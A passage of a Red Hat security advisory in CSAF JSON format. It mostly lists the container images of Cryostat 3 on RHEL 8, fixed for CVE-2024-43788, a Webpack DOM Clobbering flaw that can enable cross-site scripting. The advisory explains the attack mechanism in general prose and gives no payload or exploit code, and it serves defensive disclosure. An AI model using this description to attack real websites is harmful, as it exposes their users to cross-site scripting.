"date": "2024-12-17T19:02:22+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Cryostat 3 on RHEL 8",
"product": {
"name": "Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:cryostat:3::el8"
}
}
}
],
"category": "product_family",
"name": "Cryostat"
},
{
"branches": [
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"product_id": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"product_id": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"product_id": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"product_id": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"product_id": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"product_id": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"product_id": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"product": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"product_id": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"product": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"product_id": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f?arch=arm64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8\u0026tag=3.0.1-3"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"product_id": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"product_id": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"product_id": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"product_id": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"product_id": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"product_id": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"product_id": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8-operator\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"product": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"product_id": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-storage-rhel8\u0026tag=3.0.1-3"
}
}
},
{
"category": "product_version",
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"product": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"product_id": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"product_identification_helper": {
"purl": "pkg:oci/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455?arch=amd64\u0026repository_url=registry.redhat.io/cryostat-tech-preview/jfr-datasource-rhel8\u0026tag=3.0.1-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64"
},
"product_reference": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64"
},
"product_reference": "cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64"
},
"product_reference": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"relates_to_product_reference": "8Base-Cryostat-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64 as a component of Cryostat 3 on RHEL 8",
"product_id": "8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
},
"product_reference": "cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64",
"relates_to_product_reference": "8Base-Cryostat-3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
